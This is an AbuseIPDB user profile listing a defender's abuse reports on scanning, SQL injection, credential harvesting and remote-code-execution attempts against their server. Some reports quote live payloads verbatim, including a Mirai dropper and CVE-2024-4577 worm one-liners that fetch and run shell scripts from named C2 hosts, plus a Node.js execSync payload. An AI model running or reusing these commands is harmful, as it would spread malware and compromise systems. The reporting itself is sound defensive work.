ministar-interneta - AbuseIPDB User Profile

JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

User ministar-interneta joined AbuseIPDB in August 2025 and has reported 47 IP addresses.

Standing (weight) is good.

INACTIVE USER

IP	Date	Comment	Categories
🇸🇪 130.195.218.204	11 Mar 2026	What they did: WAF Fingerprinting via Accept-Charset header + raw IP access Identical technique to ... show more What they did: WAF Fingerprinting via Accept-Charset header + raw IP access Identical technique to Infomaniak and Alibaba cluster — hitting root / with restricted Accept-Charset header and numeric IP host header. M247 is a well-known transit provider whose IPs appear constantly in threat intelligence feeds due to VPN and proxy abuse. This is the third attacker using the exact same fingerprinting technique in 48h — strongly suggesting a shared scanning tool or coordinated campaign. show less	Email Spam Port Scan Hacking Spoofing Brute-Force Bad Web Bot Exploited Host Web App Attack
🇺🇸 134.209.124.172	11 Mar 2026	What they did: zgrab Internet-Wide Mass Scanner User agent: Mozilla/5.0 zgrab/0.x zgrab is an ope ... show more What they did: zgrab Internet-Wide Mass Scanner User agent: Mozilla/5.0 zgrab/0.x zgrab is an open-source internet scanning tool developed by the ZMap team, used to perform mass banner grabbing and service fingerprinting across the entire internet. When used maliciously it maps open services, grabs server banners, identifies software versions, and feeds data into vulnerability databases for targeting. Hitting raw IP / with zgrab — building a profile of your server's software stack, response headers, and security posture. show less	Hacking SQL Injection Brute-Force Bad Web Bot Exploited Host Web App Attack
🇺🇸 67.205.149.8	11 Mar 2026	What they did: zgrab Internet-Wide Mass Scanner User agent: Mozilla/5.0 zgrab/0.x zgrab is an ope ... show more What they did: zgrab Internet-Wide Mass Scanner User agent: Mozilla/5.0 zgrab/0.x zgrab is an open-source internet scanning tool developed by the ZMap team, used to perform mass banner grabbing and service fingerprinting across the entire internet. When used maliciously it maps open services, grabs server banners, identifies software versions, and feeds data into vulnerability databases for targeting. Hitting raw IP / with zgrab — building a profile of your server's software stack, response headers, and security posture. show less	DDoS Attack Ping of Death Phishing Web Spam Blog Spam Hacking Brute-Force Bad Web Bot Exploited Host Web App Attack
🇷🇺 193.24.123.41	11 Mar 2026	What they did: .env file credential harvesting Two attempts to access /.env — hunting for database ... show more What they did: .env file credential harvesting Two attempts to access /.env — hunting for database credentials, API keys, Stripe secrets, and mail server passwords. Prospero OOO is a well-known Russian bulletproof hoster frequently used by cybercriminals specifically because they ignore abuse reports. show less	Web Spam Hacking Brute-Force Bad Web Bot Exploited Host Web App Attack IoT Targeted
🇨🇭 83.228.230.102	11 Mar 2026	What they did: WAF Fingerprinting via Accept-Charset header abuse + raw IP access Hitting root / o ... show more What they did: WAF Fingerprinting via Accept-Charset header abuse + raw IP access Hitting root / only with restricted Accept-Charset header and numeric IP host header. Classic reconnaissance — probing security controls before launching a real attack. Identical technique to the Alibaba HK botnet we blocked earlier, suggesting the same threat actor or shared tooling. show less	Phishing Hacking Spoofing Brute-Force Exploited Host Web App Attack
🇱🇹 91.224.92.177	11 Mar 2026	What they did: Mirai Botnet ARM7 Variant DeploymentExact payload: cd /tmp;rm -rf parm7; wget http: ... show more What they did: Mirai Botnet ARM7 Variant DeploymentExact payload: cd /tmp;rm -rf parm7; wget http://94.156.152.233/bins/parm7; chmod 777 parm7; ./parm7 arm7Attack breakdown: cd /tmp — move to writable directory rm -rf parm7 — clean any previous infection wget http://94.156.152.233/bins/parm7 — download ARM7 Mirai binary from C&C chmod 777 parm7 — make executable ./parm7 arm7 — execute ARM7 architecture binary show less	Brute-Force Bad Web Bot Exploited Host Web App Attack
🇭🇰 103.218.243.42	11 Mar 2026	What they did: CVE-2024-4577 PHP-CGI RCE Worm — same campaign as Swiss NetGrid attacker, different ... show more What they did: CVE-2024-4577 PHP-CGI RCE Worm — same campaign as Swiss NetGrid attacker, different C&C Payload decoded: (wget --no-check-certificate -qO- https://31.57.216.121/sh \|\| curl -sk https://31.57.216.121/sh) \| sh -s cve_2024_4577.selfrep New C&C server: 31.57.216.121 — different from the Swiss attacker's 178.16.55.224. This confirms a coordinated global campaign running the same worm from multiple C&C servers and multiple source IPs across different countries. Attack vectors used: CVE-2024-4577 PHP-CGI injection via shell_exec + base64 PHPUnit eval-stdin.php probing across 10+ framework paths (zend, yii, drupal, workspace, www, ws) Path traversal /../ PHP config injection allow_url_include=1 + auto_prepend_file=php://input Raw IP host header to bypass virtual host rules GET requests with body content to evade WAF show less	Ping of Death Web Spam Hacking Exploited Host Web App Attack
🇧🇷 187.110.175.205	07 Mar 2026	What they did Automated FreePBX / Asterisk reconnaissance scan The request contained the scann ... show more What they did Automated FreePBX / Asterisk reconnaissance scan The request contained the scanner signature: User-Agent: mozilla/5.0 (compatible; freepbx-scanner/1.0) This identifies an automated VoIP PBX vulnerability scanner searching for publicly exposed FreePBX telephony systems. The scanner attempted to identify: FreePBX administration panels Asterisk management interfaces Misconfigured SIP endpoints Known FreePBX vulnerabilities Observed indicator: Matched Data: x-scanner found within REQUEST_HEADERS User-Agent: freepbx-scanner/1.0 show less	Web Spam Blog Spam Hacking SQL Injection Spoofing Brute-Force Bad Web Bot Exploited Host Web App Attack
🇯🇵 13.231.246.31	07 Mar 2026	🚨 Abuse Report — 13.231.246.31 (Japan, AWS EC2 ap-northeast-1, AS16509) Date/Time: 2026-03-06 UTC ... show more 🚨 Abuse Report — 13.231.246.31 (Japan, AWS EC2 ap-northeast-1, AS16509) Date/Time: 2026-03-06 UTC Origin: Amazon AWS Tokyo What they did: Next.js Server-Side Prototype Pollution + RCE (CVE-2024-46982 / CVE-2025-29927) This is a cutting edge 2024/2025 exploit targeting Next.js applications. The payload: process.mainModule.require('child_process') .execSync(echo $((41271)) \| base64 -w 0) Attack breakdown: $((41271)) — arithmetic expression to test if shell execution works (11111 = confirmed RCE) process.mainModule.require('child_process') — Node.js process hijacking execSync() — synchronous shell command execution base64 -w 0 — encode output to exfiltrate data covertly __proto__:then — prototype pollution to corrupt JavaScript object chain next_redirect — abuse Next.js redirect mechanism to smuggle data out via URL parameter ?a=${res} If successful: Full server takeover via Node.js child process execution show less	DDoS Attack Phishing Web Spam Port Scan Hacking SQL Injection Spoofing Brute-Force Bad Web Bot Exploited Host Web App Attack
🇺🇸 43.135.164.228	06 Mar 2026	🚨 Abuse Report — 43.135.164.228 (USA, Tencent Cloud AS132203) Date/Time: 2026-03-05 UTC Origin: Te ... show more 🚨 Abuse Report — 43.135.164.228 (USA, Tencent Cloud AS132203) Date/Time: 2026-03-05 UTC Origin: Tencent Cloud Computing, United States What they did: Two attack techniques in one request: 1. Multiple/Conflicting Connection Headers Sent both keep-alive and close in the Connection header simultaneously. This is a classic HTTP Request Smuggling probe — sending conflicting headers to confuse the server/proxy about where one request ends and another begins. If successful, attackers can poison shared caches, bypass security controls, or hijack other users' requests. show less	Ping of Death Phishing Web Spam Blog Spam Port Scan Hacking SQL Injection Spoofing Brute-Force Bad Web Bot Exploited Host Web App Attack SSH
🇭🇰 8.217.182.94	06 Mar 2026	🚨 Abuse Report — Alibaba Cloud Botnet (8.217.182.94, 8.217.183.237, 8.217.184.77, 8.217.209.129, 8.2 ... show more 🚨 Abuse Report — Alibaba Cloud Botnet (8.217.182.94, 8.217.183.237, 8.217.184.77, 8.217.209.129, 8.217.210.109, 8.217.212.2, 8.217.212.39, 8.217.212.86) What they did: Seven coordinated IPs all sending requests with a restricted Accept-Charset HTTP header. This is a distributed header injection fingerprinting attack — each IP sends slightly different requests to map server behavior, WAF rules, and response patterns without triggering single-IP rate limits. The Accept-Charset header is restricted by OWASP CRS because it is frequently abused to: Fingerprint WAF/IDS rules Bypass content-type filtering Inject malicious character encoding to confuse parsers Test for HTTP request smuggling vulnerabilities Why 7 different IPs? Classic botnet rotation — each IP sends only 1-2 requests to stay below fail2ban thresholds. Coordinated from a single C&C, distributed across Alibaba Cloud VMs. show less	DDoS Attack FTP Brute-Force Ping of Death Phishing Fraud VoIP Web Spam Email Spam Blog Spam Port Scan Hacking SQL Injection Spoofing Exploited Host Web App Attack
🇨🇭 167.148.183.147	06 Mar 2026	Abuse Report — 167.148.183.147 (Switzerland, NetGrid Host LTD AS202051) Date/Time: 2026-03-05 04:10 ... show more Abuse Report — 167.148.183.147 (Switzerland, NetGrid Host LTD AS202051) Date/Time: 2026-03-05 04:10:46 UTC Anomaly Score: 28 (threshold: 5) — extremely high Source: NetGrid Host LTD (Switzerland), a network known for hosting malicious activity. Attack summary — multiple vectors in a single request: 1. CVE-2024-4577 Exploit (PHP-CGI RCE) Critical 2024 PHP vulnerability. Payload sent: <?php shell_exec(base64_decode("KHdnZXQg...")); echo(md5("Hello CVE-2024-4577")); ?> Decoded payload: (wget --no-check-certificate -qO- https://178.16.55.224/sh \|\| curl -sk https://178.16.55.224/sh) \| sh -s cve_2024_4577.selfrep This downloads and executes a self-replicating shell script (worm) from 178.16.55.224, a malware C2 server. 2. PHP Configuration Injection allow_url_include=1 auto_prepend_file=php://input Attempt to enable remote file inclusion and prepend malicious PHP to all requests. 3. PHPUnit Exploit Attempt Targeted /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php. show less	Ping of Death Phishing Web Spam Blog Spam Hacking SQL Injection Spoofing Brute-Force Bad Web Bot Exploited Host Web App Attack
🇸🇬 104.194.155.77	01 Mar 2026	Passive/Active Reconnaissance — Sensitive file disclosure attempt. Maps to PenTest+: Information Gat ... show more Passive/Active Reconnaissance — Sensitive file disclosure attempt. Maps to PenTest+: Information Gathering phase. show less	Phishing Blog Spam Hacking Spoofing Bad Web Bot Exploited Host Web App Attack
🇨🇳 180.153.236.150	01 Mar 2026	Active Reconnaissance using known scanning tool (360Spider). Header injection to evade detection.	Phishing Web Spam Hacking Brute-Force Bad Web Bot Exploited Host Web App Attack
🇨🇳 42.83.147.53	01 Mar 2026	MITRE ATT&CK Tactic: Reconnaissance Technique: T1595 — Active Scanning Sub-technique: T1595.001 ... show more MITRE ATT&CK Tactic: Reconnaissance Technique: T1595 — Active Scanning Sub-technique: T1595.001 — Scanning IP Blocks show less	Phishing Blog Spam Hacking SQL Injection Spoofing Brute-Force Bad Web Bot Web App Attack
🇫🇷 45.154.138.163	01 Mar 2026	MITRE ATT&CK mapping AttackTacticTechnique.git probeReconnaissanceT1592 - Gather Victim Host Info	Phishing Web Spam Hacking Spoofing Brute-Force Web App Attack
🇧🇷 186.235.63.109	28 Feb 2026	IP 186.235.63.109 What it tried: Automated injection against parameter pfull. Techniques ob ... show more IP 186.235.63.109 What it tried: Automated injection against parameter pfull. Techniques observed: Boolean-based SQL injection using CASE WHEN (x=x) PostgreSQL-style casting ::text, ::integer Concatenation '~'\|\|(...)\|\|'~' Inline obfuscation /**/ Mixed-case evasion sELeCT Triggered both: SQLi detection (942100) RCE pattern detection (932115) Anomaly score: 10 Breakdown: SQLI=5, RCE=5 show less	Web Spam Blog Spam Hacking SQL Injection Spoofing Brute-Force Bad Web Bot Exploited Host Web App Attack
🇧🇷 187.62.151.68	28 Feb 2026	IP 187.62.151.68 What it tried: Automated error-based SQL injection against parameter pshort. ... show more IP 187.62.151.68 What it tried: Automated error-based SQL injection against parameter pshort. Techniques observed: PROCEDURE ANALYSE UPDATEXML() error-based extraction Boolean extraction via ELT(x=x,1) MySQL versioned comment bypass /!50000/ Inline comment obfuscation /**/ Multiple payload variations in rapid sequence This is a typical automated scanner pattern (likely sqlmap-style). Anomaly score: 5–15 Breakdown: SQLI=5–15 show less	Web Spam Blog Spam Hacking SQL Injection Spoofing Brute-Force Bad Web Bot Exploited Host Web App Attack
🇵🇰 202.59.13.181	28 Feb 2026	IP 202.59.13.181 What it tried: Automated Boolean-based SQL injection against parameter pfull. ... show more IP 202.59.13.181 What it tried: Automated Boolean-based SQL injection against parameter pfull. Techniques observed: CASE WHEN (x=x) boolean testing CAST(... AS INT) type coercion probing Error-based extraction using concatenation with '~' Inline comment obfuscation /**/ Encoded control characters (\x0e, \x04, etc.) to evade filters Multiple variations of the same payload Anomaly score: 5–10 Breakdown: SQLI=5–10 show less	Phishing Blog Spam Hacking SQL Injection Spoofing Brute-Force Bad Web Bot Exploited Host Web App Attack SSH IoT Targeted
🇹🇷 212.253.202.113	28 Feb 2026	IP 213.6.14.74 What it tried: Complex multi-vector injection against pshort. Detected attack ... show more IP 213.6.14.74 What it tried: Complex multi-vector injection against pshort. Detected attack classes: SQL Injection (libinjection fingerprint sos) Oracle-style error-based extraction (XMLType, CHR(), CASE WHEN, FROM DUAL) PHP injection signature match RCE signature match (Windows command pattern) Obfuscation via inline comments /**/ Boolean condition probing (4700=4700), (10691=10691), (5664=5664) Anomaly score: 15 Breakdown: SQLI=5, RCE=5, PHPI=5 show less	Phishing Web Spam Blog Spam Hacking SQL Injection Spoofing Brute-Force Bad Web Bot Exploited Host Web App Attack
🇵🇸 213.6.14.74	28 Feb 2026	IP 213.6.14.74 What it tried: Multi-vector injection attempt against parameter pshort. Attack ... show more IP 213.6.14.74 What it tried: Multi-vector injection attempt against parameter pshort. Attack types detected: SQL Injection (libinjection fingerprint sos) Error-based extraction using XMLType, CHR(), CASE WHEN Boolean condition testing (4700=4700) PHP injection pattern RCE pattern match (Windows command injection signature) Oracle-style payloads using FROM DUAL Inline comment obfuscation (/**/) Anomaly score: 15 Breakdown: SQLI=5, RCE=5, PHPI=5 show less	Phishing Web Spam Blog Spam Hacking SQL Injection Spoofing Brute-Force Bad Web Bot Exploited Host Web App Attack SSH
🇻🇪 38.68.180.72	28 Feb 2026	IP 46.2.191.238 What it tried: Automated MySQL error-based SQL injection against pfull. Techn ... show more IP 46.2.191.238 What it tried: Automated MySQL error-based SQL injection against pfull. Techniques: PROCEDURE ANALYSE UPDATEXML() error extraction Boolean validation via ELT() MySQL inline comment bypass (/!50000/) Encoded payloads Anomaly score: 15 show less	Fraud Orders Web Spam Blog Spam Hacking SQL Injection Brute-Force Bad Web Bot Exploited Host Web App Attack
🇹🇷 46.2.191.238	28 Feb 2026	IP 46.2.191.238 performed automated MySQL error-based SQL injection against pfull. Techniques use ... show more IP 46.2.191.238 performed automated MySQL error-based SQL injection against pfull. Techniques used: PROCEDURE ANALYSE UPDATEXML() error-based data extraction Boolean testing with ELT() MySQL inline comment bypass (/!50000/) Encoded payloads (\x22) Anomaly score reached 15 (high severity). show less	Phishing Web Spam Blog Spam Hacking SQL Injection Spoofing Brute-Force Bad Web Bot Exploited Host Web App Attack
🇮🇳 59.178.78.252	28 Feb 2026	IP 59.178.78.252 performed automated MySQL SQL injection against: subcats pcode_from_q Tech ... show more IP 59.178.78.252 performed automated MySQL SQL injection against: subcats pcode_from_q Techniques used: Boolean-based injection (IF(...)) Error-based extraction (EXTRACTVALUE) PROCEDURE ANALYSE exploitation attempt MySQL inline comment bypass (/!50000/) Large integer overflow trick (8446744073709551610) Data extraction markers using ELT() Anomaly score reached 15 (high severity). show less	Phishing Web Spam Blog Spam Hacking SQL Injection Spoofing Brute-Force Bad Web Bot Exploited Host Web App Attack SSH
🇹🇷 78.176.102.29	28 Feb 2026	IP 78.176.102.29 performed aggressive automated SQL injection against pshort and dispatch. Techni ... show more IP 78.176.102.29 performed aggressive automated SQL injection against pshort and dispatch. Techniques used: Oracle-style injection (ORDSYS.ORD_DICOM.GETMAPPINGXPATH, FROM DUAL) Error-based extraction (CASE WHEN) UNION-based injection MySQL inline comment bypass (/!50000/) ROW comparison injection (ROW(x,y) > SELECT) RCE-style shell pattern triggers Anomaly score reached 15–20 (high severity). show less	Phishing Web Spam Blog Spam Hacking SQL Injection Spoofing Brute-Force Bad Web Bot Exploited Host Web App Attack